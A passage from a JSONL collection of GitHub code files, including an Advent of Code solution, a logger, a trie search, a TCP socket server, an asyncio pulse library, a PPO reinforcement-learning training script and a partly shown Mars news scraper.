len(all_tiles) < n_col:\n curr_row_tiles, remain_tiles = get_next_row_tiles(\n curr_row_tiles, \n direction, \n remain_tiles, \n share_edges)\n all_tiles = [curr_row_tiles] + all_tiles\n \n return all_tiles\n\n\ndef remove_border(tile):\n new_tile = tile.copy()\n # remove the first and last element\n del new_tile[-1]\n del new_tile[0]\n \n # remove the first and last elment of each element\n return [line[1:-1] for line in new_tile]\n\ndef merge_tiles_in_row(tile1, tile2):\n res = []\n for i in range(len(tile1)):\n res.append(\"\".join([tile1[i], tile2[i]]))\n \n return res\n \ndef merge_rows(row_tiles):\n return reduce(merge_tiles_in_row, row_tiles)\n \ndef merge_tiles(all_tiles):\n res = []\n for t in all_tiles:\n res = res + merge_rows(t)\n \n return res\n \ndef find_monster(img, pattern):\n img_trans = transformers(img)\n # the python internal re.findall return all non-overlapping matches of pattern in string\n # use regex.findall instead\n trans_flatten = [reduce(lambda x, y: \"\\n\".join([x, y]), t) for t in img_trans] \n for t in trans_flatten:\n monsters = re.findall(pattern, t, overlapped=True)\n if monsters:\n break\n \n return monsters\n \n \nshare_edges, corner = get_share_borders(tiles, tile_borders)\ncurr_tiles, direction, remain_tiles = init_tiles()\nrow_tiles, remain_tiles = get_row_tiles(curr_tiles, remain_tiles)\n# next_row_tiles, remain_tiles = get_next_row_tiles(row_tiles, direction, tiles, share_edges)\nall_tiles = get_all_tiles(row_tiles, remain_tiles, share_edges)\n\nall_tiles_corrected = [[remove_border(t[1]) for t in row] for row in all_tiles]\ntiles_final = merge_tiles(all_tiles_corrected)\n\n# tiles_final_trans = transformers(tiles_final)\n# trans_flattened = [reduce(lambda x, y: \"\\n\".join([x, y]), t) for t in tiles_final_trans]\n# pattern = re.compile(r'#.{77}#.{4}##.{4}##.{4}###.{77}(?:#.{2}){6}')\npattern = re.compile(r\"(?:[.#]){18}#[.#](?:.|\\n){77}#(?:[.#]){4}##(?:[.#]){4}##(?:[.#]){4}###(?:.|\\n){77}[.#](?:#(?:[.#]){2}){5}#(?:[.#]){3}\")\n\nmonster = ''' # \n# ## ## ###\n # # # # # # '''\n \nmonsters = find_monster(tiles_final, pattern)\npart2_res = sum([t.count(\"#\") for t in tiles_final]) - len(monsters) * monster.count(\"#\")\nprint(part2_res)\n\n###================================ test\n\ntest_image = '''.#.#..#.##...#.##..#####\n###....#.#....#..#......\n##.##.###.#.#..######...\n###.#####...#.#####.#..#\n##.#....#.##.####...#.##\n...########.#....#####.#\n....#..#...##..#.#.###..\n.####...#..#.....#......\n#..#.##..#..###.#.##....\n#.####..#.####.#.#.###..\n###.#.#...#.######.#..##\n#.####....##..########.#\n##..##.#...#...#.#.#.#..\n...#..#..#.#.##..###.###\n.#.#....#.##.#...###.##.\n###.#...#..#.##.######..\n.#.#.###.##.##.#..#.##..\n.####.###.#...###.#..#.#\n..#.#..#..#.#.#.####.###\n#..####...#.#.#.###.###.\n#####..#####...###....##\n#.##..#..#...#..####...#\n.#.###..##..##..####.##.\n...###...##...#...#..###\n'''.splitlines()","repo_name":"yiluheihei/AdventOfCode","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13922091148","text":"from datetime import datetime\nimport inspect\nfrom flask import session\n\nfrom apps.proc import constants\n\n\nclass Logger(object):\n def __init__(self, filename):\n self.filename = filename\n\n def _write_log(self, level, msg):\n flat_msg = '<'+msg[0]+'> '\n\n if len(msg) > 1:\n for elem in msg[1:]:\n if type(elem) == str:\n flat_msg += elem + ' '\n else:\n flat_msg += str(elem) + ' '\n mess = \"{0} [{1}] {2}\".format(datetime.now().strftime('%m-%d-%y %H:%M:%S'), level, flat_msg)\n if level == 'ERROR':\n print(constants.bcolors.FAIL + mess + constants.bcolors.ENDC)\n elif level == 'WARN':\n print(constants.bcolors.WARNING + mess + constants.bcolors.ENDC)\n elif level == 'INFO':\n print(constants.bcolors.OKGREEN + mess + constants.bcolors.ENDC)\n elif level.startswith('DEBUG'):\n print(constants.bcolors.OKBLUE + mess + constants.bcolors.ENDC)\n else:\n print(mess)\n with open(self.filename, 'a', encoding='utf-8') as log_file:\n log_file.write(mess + '\\n')\n\n\n def critical(self, *msg):\n self._write_log('CRITICAL', msg)\n\n def error(self, *msg):\n self._write_log(\"ERROR\", msg)\n\n def warn(self, *msg):\n self._write_log(\"WARN\", msg)\n\n def info(self, *msg):\n self._write_log(\"INFO\", msg)\n\n def debug(self, *msg):\n self._write_log(\"DEBUG \"+str(inspect.stack()[1].function), msg)\n\n","repo_name":"wieslawseweryn/dash_fastapi_docker","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27361398462","text":"from . import Fonctions\nimport time\n\ndef methodeTrie(motifs, text):\n\tglobal kwtree, temps\n\tdebutTout = time.time()\n\t# Nous créons le trie\n\tkwtree = Fonctions.KeywordTree(case_insensitive=True)\n\t# Nous ajoutons les motifs un par un\n\tfor motif in motifs:\n\t\tkwtree.add(motif)\n\t# On ferme le trie, donc on peut plus ajouter de noeuds\n\t# Et cette fonction ajoute aussi les liens suffixes\n\tkwtree.finalize()\n\t# On cherche les motifs entrès dans le texte\n\tresults = kwtree.search_all(text)\n\n\tfinTout = time.time()\n\n\ttemps = finTout - debutTout\n\treturn results\n\n","repo_name":"choukribouabana/Programmationn","sub_path":"Trie/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42351081829","text":"import typing as t\n\n# 347. Top K Frequent Elements\n\n# https://leetcode.com/problems/top-k-frequent-elements/\n\n\n# Given an integer array nums and an integer k, return the k most frequent elements. You may return the answer in any order.\n\n\n# Example 1:\n# Input: nums = [1,1,1,2,2,3], k = 2\n# Output: [1,2]\n\n# Example 2:\n# Input: nums = [1], k = 1\n# Output: [1]\n\n\ndef top(\n nums: t.List[int],\n k: int,\n):\n count: t.Dict[int, int] = {}\n\n for n in nums:\n count[n] = 1 + count.get(n, 0)\n\n sorted_dict = sorted(\n count.items(),\n key=lambda x: x[1],\n reverse=True,\n )\n\n result = [int(elt[0]) for elt in sorted_dict][:k]\n\n return result\n\n\ndef test_top():\n nums = [1, 1, 1, 2, 2, 3]\n k = 2\n expected = [1, 2]\n\n result = top(\n nums=nums,\n k=k,\n )\n\n assert result == expected\n","repo_name":"richarddevers/leetcode","sub_path":"medium/347-top-k.py","file_name":"347-top-k.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36579154144","text":"\"\"\"\nimport socket\n\nHOST = #'127.0.0.1' # Server IP or Hostname\nPORT = 12345 # Pick an open Port (1000+ recommended), must match the client sport\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint ('Socket created')\n\n#managing error exception\ntry:\n\ts.bind((HOST, PORT))\nexcept socket.error:\n\tprint('Bind failed')\n\ns.listen(5)\nprint('Socket awaiting messages')\n(conn, addr) = s.accept()\nprint('Connected')\n\n# awaiting for message\nwhile True:\n\tdata = conn.recv(1024)\n\tprint('I sent a message back in response to: ') + data\n\treply = ''\n\n\t# process your message\n\tif data == 'Hello':\n\t\treply = 'Hi, back!'\n\telif data == 'This is important':\n\t\treply = 'OK, I have done the important thing you have asked me!'\n\n\t#and so on and on until...\n\telif data == 'quit':\n\t\tconn.send('Terminating')\n\t\tbreak\n\telse:\n\t\treply = 'Unknown command'\n\n\t# Sending reply\n\tconn.send(reply)\n\tconn.close() # Close connections\n\"\"\"\nimport socket \nimport threading\n\nHEADER = 64\nPORT = 5050\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"!DISCONNECT\"\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR)\n\ndef handle_client(conn, addr):\n print(f\"[NEW CONNECTION] {addr} connected.\")\n\n connected = True\n while connected:\n msg_length = conn.recv(HEADER).decode(FORMAT)\n if msg_length:\n msg_length = int(msg_length)\n msg = conn.recv(msg_length).decode(FORMAT)\n if msg == DISCONNECT_MESSAGE:\n connected = False\n\n print(f\"[{addr}] {msg}\")\n conn.send(\"Msg received\".encode(FORMAT))\n\n conn.close()\n return False\n \n\ndef start():\n server.listen()\n print(f\"[LISTENING] Server is listening on {SERVER}\")\n while True:\n conn, addr = server.accept()\n #thread = threading.Thread(target=handle_client, args=(conn, addr))\n #thread.start()\n \n if (handle_client(conn, addr)) == False:\n print(f\"[{addr}] Server closed!\")\n break\n #print(f\"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}\")\n\n\nprint(\"[STARTING] server is starting...\")\nstart()\n","repo_name":"thong-nt/Driver-status-estimator-tensorflow","sub_path":"script/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30520405404","text":"from __future__ import annotations\n\nimport time\nimport asyncio\nfrom asyncio import Future\nfrom collections import deque\nfrom datetime import timedelta\nfrom functools import partial\nfrom typing import AsyncIterator, Callable, cast, Coroutine, Generator\n\ntry:\n from typing import ParamSpec\nexcept ImportError:\n from typing_extensions import ParamSpec\n\nfrom .fuse import Fuse\n\n_P = ParamSpec(\"_P\")\n\n\nclass PulseClosed(Exception):\n \"\"\"Raised when a pulse is closed.\"\"\"\n\n\nclass _BasePulse:\n def __init__(self) -> None:\n self._waiters: deque[Future[float]] = deque()\n self._value: float | None = None\n self._loop = asyncio.get_event_loop()\n self._closed = Fuse()\n self._pulse_callbacks: list[Callable[[float], object] | Callable[[], object]] = []\n\n def add_pulse_callback(\n self,\n callback: Callable[_P, object],\n thread_safe: bool = False,\n *__args: _P.args,\n **__kwargs: _P.kwargs,\n ) -> None:\n \"\"\"Add a callback to be called when the pulse is fired.\n\n If it is a coroutine, it will be scheduled as a task; otherwise, it will be scheduled\n via the event loop's call_soon method if thread_safe is False, or via call_soon_threadsafe\n if thread_safe is True.\n \"\"\"\n\n if asyncio.iscoroutinefunction(callback):\n _fn = cast(Callable[_P, Coroutine[object, object, object]], callback)\n\n def _cb() -> None:\n _ = asyncio.create_task(_fn(*__args, **__kwargs))\n\n elif thread_safe:\n\n def _cb() -> None:\n self._loop.call_soon_threadsafe(partial(callback, *__args, **__kwargs))\n\n else:\n\n def _cb() -> None:\n self._loop.call_soon(partial(callback, *__args, **__kwargs))\n\n self._pulse_callbacks.append(_cb)\n\n def _run_callbacks(self) -> None:\n for cb in self._pulse_callbacks:\n self._loop.call_soon(cb)\n\n @property\n def is_closed(self) -> bool:\n \"\"\"Return True if the pulse is closed.\"\"\"\n return self._closed.is_set()\n\n def close(self) -> None:\n \"\"\"Close the pulse, waking up all waiters.\n\n The resulting future will have a PulseClosed exception set as its exception.\n \"\"\"\n self._closed.set()\n for fut in self._waiters:\n fut.set_exception(PulseClosed())\n\n async def wait_closed(self) -> None:\n \"\"\"Wait for the pulse to be closed.\"\"\"\n await self._closed.wait()\n\n def wait(self) -> Future[float]:\n \"\"\"Wait for the pulse to be fired.\n\n Returns a future that will be resolved when the pulse is fired.\n The future's result will be the time at which the pulse was fired, as per time.time().\n \"\"\"\n fut = asyncio.get_event_loop().create_future()\n self._waiters.append(fut)\n return fut\n\n def __await__(self) -> Generator[None, None, float]:\n \"\"\"Wait for the pulse to be fired.\n\n Returns the time at which the pulse was fired, as given by time.time().\n \"\"\"\n return self.wait().__await__()\n\n async def _aiter(self) -> AsyncIterator[float]:\n while True:\n try:\n yield await self\n except PulseClosed:\n break\n\n def __aiter__(self) -> AsyncIterator[float]:\n return self._aiter()\n\n def _fire(self) -> None:\n \"\"\"Fire the pulse, waking up all waiters.\n\n The resulting future will be resolved with the current time.\n \"\"\"\n if self._closed.is_set():\n raise RuntimeError(\"Cannot fire a closed pulse\")\n\n self._value = time.time()\n for fut in self._waiters:\n fut.set_result(self._value)\n self._waiters.clear()\n\n self._run_callbacks()\n\n\nclass Pulse(_BasePulse):\n \"\"\"A pulse that can be triggered and waited for.\n\n Waiting for a pulse will block until the pulse is triggered, and will return\n the time at which the pulse was triggered. Alternatively, the pulse can be given\n a function to call when it is triggered. In this case, the return value of waiting\n on the pulse will be the result of calling the function.\n\n The pulse can be closed, which will cause all waiters to be woken up with a\n PulseClosed exception. After the pulse is closed, it cannot be fired again.\n\n The pulse can be used as an async iterator, which will yield the time at which\n the pulse is fired. The iterator will stop yielding when the pulse is closed.\n\n Examples:\n >>> pulse = Pulse()\n >>> pulse.fire()\n >>> await pulse\n 123.456\n\n >>> pulse = Pulse()\n >>> pulse.add_pulse_callback(lambda: print(\"Pulse fired!\"))\n >>> pulse.fire()\n Pulse fired!\n\n >>> pulse = Pulse()\n >>> async def pulse_subscriber(pulse: Pulse) -> None:\n ... async for t in pulse:\n ... print(t)\n >>> asyncio.create_task(pulse_subscriber(pulse))\n >>> pulse.fire()\n 123.456\n >>> pulse.fire()\n 123.457\n >>> pulse.close()\n >>> pulse.fire()\n Traceback (most recent call last):\n ...\n RuntimeError: Cannot fire a closed pulse\n \"\"\"\n\n fire = _BasePulse._fire\n\n\nclass PeriodicPulse(_BasePulse):\n \"\"\"A pulse that fires periodically.\n\n The pulse will fire every `interval` seconds, and will wait for `delay` seconds\n before the first pulse is fired. This can be used to implement a periodic task,\n and is different from asyncio's `loop.call_later` or `while True: await asyncio.sleep(x)`\n in that it will not drift over time.\n\n The pulse can be closed, which will cause all waiters to be woken up with a\n PulseClosed exception. After the pulse is closed, it does not fire again.\n\n The pulse can be used as an async iterator, which will yield the time at which\n the pulse is fired. The iterator will stop yielding when the pulse is closed.\n\n Examples:\n >>> pulse = PeriodicPulse(1.0)\n >>> async for t in pulse:\n ... print(t)\n 123.456\n 124.456\n 125.456\n\n >>> pulse = PeriodicPulse(period=timedelta(minutes=5), start_delay=0.5)\n >>> pulse.add_pulse_callback(lambda: print(f\"Pulse fired! {time.time()}\"))\n >>> await asyncio.sleep(60 * 15)\n Pulse fired! 12:00:00\n Pulse fired! 12:05:00\n Pulse fired! 12:10:00\n \"\"\"\n\n def __init__(\n self,\n period: float | timedelta,\n start_delay: float | timedelta | None = None,\n ) -> None:\n \"\"\"Create a periodic pulse.\n\n Args:\n period: The period of the pulse, in seconds or a timedelta.\n start_delay: The delay before the first pulse is fired. If None, the first pulse\n will be fired after `period` seconds. To fire the first pulse immediately,\n pass 0.\n \"\"\"\n super().__init__()\n self._period = period.total_seconds() if isinstance(period, timedelta) else period\n\n self._ticks = 0\n\n if start_delay is None:\n self._start_delay = self._period\n elif isinstance(start_delay, timedelta):\n self._start_delay = start_delay.total_seconds()\n else:\n self._start_delay = start_delay\n\n self._start_time = self._loop.time()\n self._next_tick_handle = self._loop.call_at(\n self._start_time + self._start_delay,\n self._tick,\n )\n self._target_period: float | None = None\n\n def _tick(self) -> None:\n if self._closed.is_set():\n return\n\n self._fire()\n\n if self._target_period is not None:\n self._period = self._target_period\n self._target_period = None\n self._ticks = 0\n self._start_time = self._loop.time()\n self._start_delay = 0\n\n self._ticks += 1\n self._next_tick_handle = self._loop.call_at(\n when=self._start_time + self._period * self._ticks + self._start_delay,\n callback=self._tick,\n )\n\n @property\n def period(self) -> timedelta:\n \"\"\"The period of the pulse.\"\"\"\n return timedelta(seconds=self._period)\n\n @period.setter\n def period(self, period: float | timedelta) -> None:\n self._target_period = period if isinstance(period, float) else period.total_seconds()\n\n\nif __name__ == \"__main__\":\n import time\n\n async def main() -> None:\n pulse = Pulse()\n\n async def show_pulses() -> None:\n async for t in pulse:\n print(f\"pulse1 fired at {t}\")\n print(\"pulse1 finished\")\n\n for _ in range(3):\n asyncio.create_task(show_pulses())\n\n pulse.fire()\n await asyncio.sleep(0.1)\n pulse.fire()\n await asyncio.sleep(0.1)\n pulse.fire()\n await asyncio.sleep(0.3)\n pulse.fire()\n await asyncio.sleep(0.3)\n pulse.close()\n\n time_pulse = PeriodicPulse(0.25)\n\n async def show_time_pulses() -> None:\n # async for t in time_pulse:\n # print(f\"time_pulse fired at {t}\")\n t = await time_pulse\n print(f\"time_pulse fired at {t}\")\n print(\"time_pulse finished\")\n\n for _ in range(3):\n asyncio.create_task(show_time_pulses())\n\n await asyncio.sleep(3)\n\n print(\"awaiting once\", time.time())\n await time_pulse\n print(\"awaiting twice\", time.time())\n await time_pulse\n print(\"awaiting thrice\", time.time())\n await time_pulse\n print(\"awaiting finished\", time.time())\n time_pulse.close()\n\n async def main_test_set_period() -> None:\n t = time.time()\n start_delay = 1 - divmod(t, 1)[1] # start at the next second, for round numbers\n # await asyncio.sleep(start_delay)\n pulse = PeriodicPulse(0.1, start_delay=start_delay)\n start_time = time.time()\n print(f\"start_time: {start_time}; period: {pulse.period}\")\n pulse.add_pulse_callback(\n lambda: print(f\"pulse fired at t+{time.time()-start_time:3.5f}\")\n )\n await asyncio.sleep(1.3)\n print(\"setting period to 0.5\")\n pulse.period = timedelta(seconds=0.5)\n await asyncio.sleep(5)\n pulse.close()\n\n await main_test_set_period()\n\n asyncio.run(main())\n\n\n__all__ = (\"PeriodicPulse\", \"Pulse\", \"PulseClosed\")\n","repo_name":"pedrovhb/asynkets","sub_path":"asynkets/pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":10461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73491241153","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport argparse\nimport math\nfrom distutils.version import LooseVersion\nfrom ruamel.yaml import YAML, dump, RoundTripDumper\nimport logging\n\nimport torch\nfrom torch import nn\n\nimport pfrl\nfrom pfrl import utils\n\nfrom rslgym.wrapper import VecEnvPython\nfrom rslgym_wrapper_cart_pole import cart_pole_example_env\nfrom rslgym.wrapper import train_agent_batch_with_evaluation_pfrl\nfrom rslgym.wrapper import eval_performance_pfrl\nfrom rslgym.algorithm.utils import ConfigurationSaver\n\n\ndef main():\n if LooseVersion(torch.__version__) < LooseVersion(\"1.5.0\"):\n raise Exception(\"This script requires a PyTorch version >= 1.5.0\")\n\n # config file arg\n parser = argparse.ArgumentParser()\n parser.add_argument('--cfg_name', type=str, default='/cfg.yaml', help='configuration file')\n parser.add_argument( \"--demo\", action=\"store_true\", help=\"Just run evaluation, not training.\")\n parser.add_argument( \"--demo-record\", action=\"store_true\", help=\"Save video of demo.\")\n parser.add_argument( \"--load\", type=str, default=\"\", help=\"Directory to load agent from.\")\n parser.add_argument( \"--log-interval\", type=int, default=1000,\n help=\"Interval in timesteps between outputting log messages during training\",)\n parser.add_argument( \"--eval-interval\", type=int, default=5000,\n help=\"Interval in timesteps between evaluations.\",)\n parser.add_argument( \"--checkpoint-interval\", type=int, default=5000,\n help=\"Interval in timesteps between saving checkpoint\",)\n parser.add_argument( \"--eval-n-runs\", type=int, default=10,\n help=\"Number of episodes run for each evaluation.\",\n )\n parser.add_argument('--gpu', type=int, default=0, help='gpu id (-1 for cpu)')\n args = parser.parse_args()\n cfg_name = args.cfg_name\n\n # folder config & logdir\n task_path = os.path.dirname(os.path.realpath(__file__))\n rsc_path = task_path + \"/../rsc\"\n env_path = task_path + \"/..\"\n cfg_abs_path = task_path + \"/../\" + cfg_name\n log_dir = os.path.join(task_path, 'runs/pfrl_ppo')\n\n save_items = [env_path + '/Environment.hpp',\n cfg_abs_path,\n __file__]\n cfg_saver = ConfigurationSaver(log_dir, save_items, args)\n\n # environment\n cfg = YAML().load(open(cfg_abs_path, 'r'))\n impl = cart_pole_example_env(rsc_path, dump(cfg['environment'], Dumper=RoundTripDumper))\n env = VecEnvPython(impl)\n steps_per_episode = math.floor(cfg['environment']['max_time'] / cfg['environment']['control_dt'])\n total_steps_per_iteration = steps_per_episode * cfg['environment']['num_envs']\n if total_steps_per_iteration%cfg['algorithm']['num_mini_batches'] > 0.01:\n raise Exception(\"nminibatches needs to be a multiple of total steps per iteration\")\n\n total_steps_per_minibatch = int(total_steps_per_iteration/cfg['algorithm']['num_mini_batches'])\n log_interval_steps = total_steps_per_iteration # log (print to terminal) at every algorithm iteration\n eval_interval_steps = total_steps_per_iteration * 20 # evaluate and record video, update tb,\n total_training_steps = cfg['algorithm']['total_algo_updates'] * total_steps_per_iteration\n checkpoint_save_interval_steps = eval_interval_steps\n\n print(steps_per_episode)\n print('total_steps_per_iteration: ', total_steps_per_iteration)\n print('total_steps_per_minibatch: ', total_steps_per_minibatch)\n print('log_interval_steps: ', log_interval_steps)\n print('eval_interval_steps: ', eval_interval_steps)\n print('total_training_steps: ', total_training_steps)\n print('checkpoint_save_interval_steps: ', checkpoint_save_interval_steps)\n\n # seeding\n seed = cfg['environment']['seed']\n torch.manual_seed(seed)\n utils.set_random_seed(seed) # Set a random seed used in PFRL\n\n # actor & critic\n policy = torch.nn.Sequential(\n nn.Linear(env.observation_space.shape[0], 32),\n nn.Tanh(),\n nn.Linear(32, 32),\n nn.Tanh(),\n nn.Linear(32, env.action_space.shape[0]),\n pfrl.policies.GaussianHeadWithStateIndependentCovariance(\n action_size=env.action_space.shape[0],\n var_type=\"diagonal\",\n var_func=lambda x: torch.exp(2 * x), # Parameterize log std\n var_param_init=0, # log std = 0 => std = 1\n ),\n )\n\n vf = torch.nn.Sequential(\n nn.Linear(env.observation_space.shape[0], 32),\n nn.Tanh(),\n nn.Linear(32, 32),\n nn.Tanh(),\n nn.Linear(32, 1),\n )\n def ortho_init(layer, gain):\n nn.init.orthogonal_(layer.weight, gain=gain)\n nn.init.zeros_(layer.bias)\n\n ortho_init(policy[0], gain=1)\n ortho_init(policy[2], gain=1)\n ortho_init(policy[4], gain=1e-2)\n ortho_init(vf[0], gain=1)\n ortho_init(vf[2], gain=1)\n ortho_init(vf[4], gain=1)\n\n model = pfrl.nn.Branched(policy, vf)\n opt = torch.optim.Adam(model.parameters(), lr=cfg['algorithm']['learning_rate'], eps=1e-5)\n\n agent = pfrl.agents.PPO(\n model,\n opt,\n obs_normalizer=None,\n gpu=args.gpu,\n value_func_coef=cfg['algorithm']['vf_coef'],\n update_interval=total_steps_per_iteration,\n minibatch_size=total_steps_per_minibatch,\n epochs=cfg['algorithm']['num_epochs'],\n clip_eps_vf=None,\n entropy_coef=cfg['algorithm']['ent_coef'],\n standardize_advantages=True,\n gamma=cfg['algorithm']['discount_factor'],\n lambd=cfg['algorithm']['gae_lam']\n )\n\n # logger settings\n logging.basicConfig(level=logging.INFO, stream=sys.stdout, format='')\n logger = logging.getLogger(__name__)\n\n if len(args.load) > 0:\n agent.load(args.load)\n\n if args.demo:\n if cfg['environment']['render']:\n env.show_window()\n if args.demo_record:\n env.start_recording_video(args.load + \"/../demo_\" + os.path.basename(args.load) + \".mp4\")\n eval_stats = eval_performance_pfrl(\n env=env,\n agent=agent,\n n_steps=None,\n n_episodes=args.eval_n_runs,\n max_episode_len=steps_per_episode,\n visualize=cfg['environment']['render'],\n )\n if cfg['environment']['render']:\n if args.demo_record:\n env.stop_recording_video()\n env.hide_window()\n print(\n \"n_runs: {} mean: {} median: {} stdev {}\".format(\n args.eval_n_runs,\n eval_stats[\"mean\"],\n eval_stats[\"median\"],\n eval_stats[\"stdev\"],\n )\n )\n else:\n train_agent_batch_with_evaluation_pfrl(\n agent=agent,\n env=env,\n outdir=cfg_saver.data_dir,\n steps=total_training_steps,\n eval_n_steps=steps_per_episode,\n eval_n_episodes=None, # eval_n_steps or eval_n_episodes, one of them must be none!\n eval_interval=eval_interval_steps, # in timesteps\n log_interval=log_interval_steps, # in timesteps\n max_episode_len=steps_per_episode,\n visualize=cfg['environment']['render'],\n use_tensorboard=True,\n checkpoint_freq=checkpoint_save_interval_steps,\n logger=logger\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"leggedrobotics/RSLGym","sub_path":"examples/envs/cart_pole/scripts/pfrl_ppo_train.py","file_name":"pfrl_ppo_train.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"61"}
+{"seq_id":"30989000711","text":"f = open(\"configEntries.txt\", \"r\")\nraw = f.read()\n\nli = raw.split(\"\\n\")\n\nnewToggles = []\n\nfor string in li:\n if string.find(\"//\") != -1 or string == \"\":\n continue\n\n stringElements = string.split(\" \")\n\n configName = \"toggles.Add(\" + stringElements[3][:-1] + \");\"\n newToggles.append(configName)\n\n\nfor string in newToggles:\n print(string)\n\n \n","repo_name":"SylmarDev/SpireItems","sub_path":"togglesAdd.py","file_name":"togglesAdd.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23644095463","text":"# --------------------------------------------------------------------------------------------------------------------------------\n# Imports and Executables \n# --------------------------------------------------------------------------------------------------------------------------------\nfrom splinter import Browser\n\nfrom bs4 import BeautifulSoup as soupy\n\nimport pandas as pd\n\nimport datetime as dt\n\n\n\n\n# --------------------------------------------------------------------------------------------------------------------------------\n# Gathered Data \n# --------------------------------------------------------------------------------------------------------------------------------\n\ndef scrape_all():\n\n # Set the executable path and initialize the chrome browser in splinter\n browser = Browser('chrome', **{'executable_path':'chromedriver'}, headless=True)\n # headless = True, doesnt show automated script in action\n \n # pylint: disable=unbalanced-tuple-unpacking\n # news_title, news_teaser_sum, news_date = mars_news(browser)\n news_title, news_teaser_sum = mars_news(browser) \n\n # Runs all separate scraping functions and stores results in a dictionary\n mars_total_data = {\n \"news_title\" : news_title,\n \"news_paragraph_summary\" : news_teaser_sum,\n # \"news_latest_date\" : news_date,\n # \"news_latest_link\" : latest_art_link,\n \"featured_image\" : featured_image(browser),\n \"facts\" : mars_facts(),\n \"img_and_url\": get_url(browser),\n \"last_modified\" : dt.datetime.now()}\n\n browser.quit()\n\n return mars_total_data\n\n\n# --------------------------------------------------------------------------------------------------------------------------------\n# News Title and Paragraph\n# --------------------------------------------------------------------------------------------------------------------------------\n\ndef mars_news(browser):\n# defined outside of the function, basically a catalyst to get the function started, like a grandfather variable\n# browser function already defined outside \n\n # Visit the mars nasa news site\n nasa_url = 'https://mars.nasa.gov/news/'\n\n browser.visit(nasa_url)\n\n # optional delay for loading page\n browser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n # Convert the browser html to a soup object and then quit the browser\n parse_html = browser.html\n\n news_soup = soupy(parse_html, 'html.parser')\n\n \n try:\n # add error handling, espescially for AttributeErros with try/except\n # if error, code will keep running, except it will stop when its AttributeError with none returned\n \n slide_elem = news_soup.select_one('ul.item_list li.slide') # parent element, holds other elements to furthur filter\n\n # Use the parent element to find the first a tag and save it as `news_title`\n news_title = slide_elem.find('div',class_='content_title').get_text()\n\n # news_date = slide_elem.find('div',class_='list_date').get_text()\n\n # latest_art_link = f\"https://mars.nasa.gov{slide_elem.select_one('ul li a').get('href')}\"\n\n # Use the parent element to find the paragraph text\n news_teaser_sum = slide_elem.find('div',class_='article_teaser_body').get_text()\n\n except AttributeError:\n\n return None, None\n\n # return news_title, news_teaser_sum, news_date, latest_art_link\n\n return news_title, news_teaser_sum\n\n# --------------------------------------------------------------------------------------------------------------------------------\n# JPL Featured Space Image\n# --------------------------------------------------------------------------------------------------------------------------------\n\n# Visit URL\ndef featured_image(browser):\n\n url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n\n browser.visit(url)\n\n # Find and click the full image button\n full_image_elem = browser.find_by_id('full_image')\n\n full_image_elem.click()\n\n # Find the more info button and click that\n browser.is_element_present_by_text('more info', wait_time=1)\n\n more_info_elem = browser.links.find_by_partial_text('more info')\n\n more_info_elem.click()\n\n # Parse the resulting html with soup\n parse_html = browser.html\n\n full_img_soup = soupy(parse_html, 'html.parser' )\n\n try:\n\n # find the relative image url\n latest_image_full = full_img_soup.select_one('figure.lede a img').get(\"src\")\n\n except AttributeError:\n\n return None\n\n # Use the base url to create an absolute url\n latest_imgurl = f\"https://www.jpl.nasa.gov{latest_image_full}\"\n\n return latest_imgurl \n\n# --------------------------------------------------------------------------------------------------------------------------------\n# Mars Fact Table\n# --------------------------------------------------------------------------------------------------------------------------------\n\ndef mars_facts():\n\n try:\n \n mars_df = pd.read_html('https://space-facts.com/mars/')[0]\n\n except BaseException:\n # covers all exception errors \n\n return None\n\n # Assign columns and set index of dataframe\n mars_df.columns = ['Description', 'Mars'] # adds column names\n\n mars_df.set_index('Description', inplace=True) # set column index\n\n # Convert dataframe into HTML format, add bootstrap\n return mars_df.to_html(classes= \"table\")\n\n\n\n# --------------------------------------------------------------------------------------------------------------------------------\n# Mars Hemispheres\n# --------------------------------------------------------------------------------------------------------------------------------\n\ndef get_url(browser):\n\n hemis_search_list = ['Cerberus Hemisphere Enhanced',\n 'Schiaparelli Hemisphere Enhanced',\n 'Syrtis Major Hemisphere Enhanced',\n 'Valles Marineris Hemisphere Enhanced']\n\n names_n_url = []\n\n Hemisphere = \"Hemisphere\"\n\n Urlid = \"URL\"\n\n for x in range(len(hemis_search_list)):\n \n url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n\n browser.visit(url)\n \n try:\n\n browser.is_element_present_by_text((f'{hemis_search_list[x]}'), wait_time=2)\n \n hemi_click = browser.links.find_by_partial_text(f'{hemis_search_list[x]}')\n \n hemi_click.click()\n \n parse_html = browser.html\n\n hemi_parse_html = soupy(parse_html, 'html.parser' )\n \n hemi_img_url = hemi_parse_html.select_one('ul li a').get(\"href\")\n \n 